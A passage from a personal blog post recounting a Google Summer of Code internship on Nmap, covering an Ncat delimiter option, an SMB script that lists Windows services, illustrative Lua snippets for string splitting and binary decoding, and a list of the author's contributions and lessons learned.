<p>At this point, I was fatigued from working only on web-related stuff and felt like I needed a change of pace. I thought of working on something that has nothing to do with the web, and the following are my achievements in other parts of Nmap.</p>
</blockquote>
<h2 id="heading-dollar-ncat-enhancement-limit-data-using-a-delimiter">$ ncat enhancement - limit data using a delimiter</h2>
<p>Ncat is a reimplementation of the currently splintered and reasonably unmaintained Netcat family. Ncat can act as either a client or server, using TCP or UDP over IPv4 or IPv6. SSL support is provided for both the client and server modes.</p>
<p>I had been working in Lua since the start of GSOC, and for the first time I was hit with the idea of working on something apart from the web and Lua. This enhancement was implemented purely in the C language.</p>
<p>This will be a good enhancement to the existing Ncat once the PR gets merged. Functions were added to accept a delimiter as a command-line parameter and to delimit the data on it before sending; the idea is sketched below.</p>
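<p>The actual change is C code inside Ncat; the fragment below is only a Lua rendering of the idea, splitting buffered input on a user-supplied delimiter so a sender can push one chunk at a time. How the real option treats the delimiter and trailing data is up to the C implementation, not this sketch.</p>
<pre><code class="lang-lua">-- Idea sketch (the real enhancement is in C): split buffered input on a
-- delimiter so each chunk can be sent separately.
local function split_on(buffer, delimiter)
  local escaped = delimiter:gsub("(%W)", "%%%1")   -- escape pattern magic chars
  local chunks, last = {}, 1
  for piece, pos in buffer:gmatch("(.-)" .. escaped .. "()") do
    chunks[#chunks + 1] = piece
    last = pos
  end
  chunks[#chunks + 1] = buffer:sub(last)           -- trailing remainder
  return chunks
end

for _, chunk in ipairs(split_on("alpha,beta,gamma", ",")) do
  print(chunk)   -- a real sender would transmit one chunk per iteration
end
</code></pre>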
<blockquote>
<p>At this stage I felt that my GSOC was about to be complete and I hadn’t done anything new; I was just getting better at what I already knew. I wanted to learn and contribute more, and to work on something totally new to me.</p>
<p>I chose to work on Windows SMB-related stuff. I didn’t even know what SMB meant until this point. I requested my mentor to allow me to work on this new area, and I was left with only 10 days when I started to work on SMB.</p>
</blockquote>
<h2 id="heading-dollar-script-to-fetch-smb-enum-services-from-remote-windows-machine">$ script to fetch smb enum services from remote windows machine</h2>
<p><img src="https://miro.medium.com/max/3840/1*bgnyffQP7govqkdfJCiRdg.png" alt /></p>
<p>Random capture of a response sent by Windows</p>
<p>The SMB protocol is used by Windows systems. I wrote a script that fetches the list of services running on a remote Windows system, along with each service’s status message. This was the most challenging part of my entire GSOC.</p>
<p>I had less than 2 weeks to complete this task, and I had just started learning the definitions of SMB, CIFS, and so on. Once I understood the definitions, I tried to write the code, but I wasn’t familiar at all with protocols like SMB, DCERPC, SVCCTL, and so on. You can’t send a GET/POST request directly as you would with HTTP/HTTPS. It’s a whole new game.</p>
<p>I found a Sysinternals tool from Microsoft that lists services, <a target="_blank" href="https://docs.microsoft.com/en-us/sysinternals/downloads/psservice">psservice.exe</a>. I intercepted the packets sent by psservice.exe, thinking I could easily replicate the requests based on that data.</p>
<p><img src="https://miro.medium.com/max/3840/1*UYfLzymUIE_ESkHgh3F4QA.png" alt /></p>
<p>After seeing the capture, I was like, WTF is going on? I understood how the requests were being sent, but I didn’t know how to code them. I got some useful resources from my mentor and figured out a way to establish the connection. Finally, wow… I made the connection, and the response looked something like this.</p>
<p><img src="https://miro.medium.com/max/3840/1*IJQ7n0hcVYSqa--bMtpHVw.png" alt /></p>
<p>Debugging output which shows a part of the request and response sent to the server</p>
<p><img src="https://miro.medium.com/max/3840/1*sTUrd3bTTcXslYQlHnumGw.png" alt /></p>
<p>Piece of response data received from the Windows server after making a svcctl request</p>
<p>I was so happy when I got the response from the server, and I thought it was almost done.</p>
<blockquote>
<p>The response is binary data, and unmarshalling (decoding) that binary data was the trickiest and most challenging task of my whole GSOC period.</p>
</blockquote>
<p>After a long struggle of two days, the binary data was unmarshalled, and the script displayed all the services with their service name, display name, and service status.</p>
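<p>To give a flavour of what that unmarshalling involves, here is a small standalone Lua 5.3+ sketch that pulls little-endian integers and a UTF-16LE string out of a binary blob with string.unpack. The field layout is invented for illustration; the real SVCCTL reply is an NDR-encoded structure with far more bookkeeping.</p>
<pre><code class="lang-lua">-- Toy unmarshalling example (Lua 5.3+). The layout below is invented;
-- the real SVCCTL response is an NDR-encoded structure.
local function read_record(blob, offset)
  -- two little-endian 32-bit fields, then a length-prefixed UTF-16LE name
  local service_type, state, name_len, pos =
        string.unpack("&lt;I4 I4 I4", blob, offset)
  local raw  = blob:sub(pos, pos + name_len * 2 - 1)
  local name = raw:gsub("(.)(.)", "%1")   -- crude UTF-16LE to ASCII
  return { type = service_type, state = state, name = name }
end

-- Build a sample blob and decode it back.
local blob = string.pack("&lt;I4 I4 I4", 0x30, 4, 7) .. "S\0p\0o\0o\0l\0e\0r\0"
local rec  = read_record(blob, 1)
print(rec.name, rec.state)   -- prints: Spooler   4
</code></pre>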
<p>Taking up this very challenging task on a narrow deadline gave me the immense pleasure of participating in GSOC, and I learned many new things about Windows protocols and decoding binary data.</p>
<h1 id="heading-my-gsoc-codebase">My GSOC codebase</h1>
<p>This section contains the links to the work I have done so far through GSOC.</p>
<p>The below data is taken on Sep 28, 2017.</p>
<p><img src="https://miro.medium.com/max/3628/1*AIwF_v2_-xxYQp3Mheq4Mg.jpeg" alt /></p>
<h2 id="heading-merged-commits-total-23">Merged commits: Total 23</h2>
<h2 id="heading-opened-prs-total-12">Opened PRs: Total 12</h2>
<p><a target="_blank" href="https://github.com/nmap/nmap/pulls/rewanthtammana">https://github.com/nmap/nmap/pulls/rewanthtammana</a></p>
<h2 id="heading-my-closed-prs-total-21">My Closed PRs: Total 21</h2>
<p><a target="_blank" href="https://github.com/nmap/nmap/pulls?q=is%3Aclosed+is%3Apr+author%3Arewanthtammana+">https://github.com/nmap/nmap/pulls?q=is%3Aclosed+is%3Apr+author%3Arewanthtammana+</a></p>
<ul>
<li><p><strong>Others’ PRs I closed</strong>: 2 (<a target="_blank" href="https://github.com/nmap/nmap/pull/728">#728</a>,<a target="_blank" href="https://github.com/nmap/nmap/pull/896">#896</a>)</p>
</li>
<li><p><strong>My opened issues</strong>: 2 (<a target="_blank" href="https://github.com/nmap/nmap/issues/741">#741</a>,<a target="_blank" href="https://github.com/nmap/nmap/issues/748">#748</a>)</p>
</li>
<li><p><strong>Others’ issues I closed</strong>: 2 (<a target="_blank" href="https://github.com/nmap/nmap/issues/726">#726</a>,<a target="_blank" href="https://github.com/nmap/nmap/issues/902">#902</a>)</p>
</li>
</ul>
<h1 id="heading-things-i-learned-through-gsoc">Things I learned through GSOC</h1>
<ul>
<li><p>Learned the kind of background work needed to be done before starting to write the main code.</p>
</li>
<li><p>Collaborate with highly experienced people remotely.</p>
</li>
<li><p>Breaking the code into components at each stage. In other words, learned to write modular code effectively.</p>
</li>
<li><p>Effectively reading technical and research papers.</p>
</li>
<li><p>Techniques to be followed while refactoring existing code.</p>
</li>
<li><p>Writing scalable code. The experience with the openwebnet-discovery script taught me this very well.</p>
</li>
<li><p>Improved my exploitation script writing skills.</p>
</li>
<li><p>Switching between tasks quickly and with ease.</p>
</li>
<li><p>Gained knowledge of the SMB protocol and unmarshalling hexdump.</p>
</li>
<li><p>Analyzing the transfer of packets over Wireshark to find the errors.</p>
</li>
<li><p>Networking.</p>
</li>
<li><p>Don’t dive into new areas directly without any prior knowledge.</p>
</li>
</ul>
<p>Finally, a quote from <em>The Pragmatic Programmer</em> that inspired me:</p>
<blockquote>
<p>“Writing code that writes code” differentiates the best from the rest, and I did this throughout my internship period ;)</p>
</blockquote>
]]></content:encoded></item></channel></rss>